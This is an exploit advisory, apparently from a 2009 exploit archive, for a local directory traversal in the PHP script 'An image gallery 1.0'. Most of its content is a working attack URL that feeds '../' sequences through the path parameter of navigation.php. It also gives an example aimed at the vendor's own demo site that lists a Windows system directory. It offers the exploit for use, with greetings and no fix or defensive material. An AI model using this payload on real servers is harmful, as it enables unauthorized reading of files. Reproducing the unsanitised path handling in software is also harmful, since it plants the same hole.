[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : An image gallery 1.0 (navigation.php) Local Directory Traversal Vuln
# Published : 2009-09-10
# Author : ThE g0bL!N
# Previous Title : Drunken:Golem Gaming Portal (admin_news_bot.php) RFI Vulnerability
# Next Title : T-HTB Manager 0.5 Multiple Blind SQL Injection Vulnerabilities
-------------------------------------------------------------------------
An image gallery 1.0(navigation.php) Local Directory Traversal
-------------------------------------------------------------------------
# Author : ThE g0bL!N
# Download : http://www.plohni.com/wb/content/php/download/An_image_gallery_1-0.zip
# Note: Algerie 1 - 0 Zambie
============================================
# Exploit :
-----------
http://localhost/PATH/navigation.php?path=../../../../../../../
#ex :
-------
http://www.plohni.com/wb/content/php/demos/An_image_gallery/navigation.php?path=../../../../../../../windows/
============================================
Greetz:His0k4 & All My Friends
-------------------------------------------------------------------------
# www.Syue.com [2009-09-10]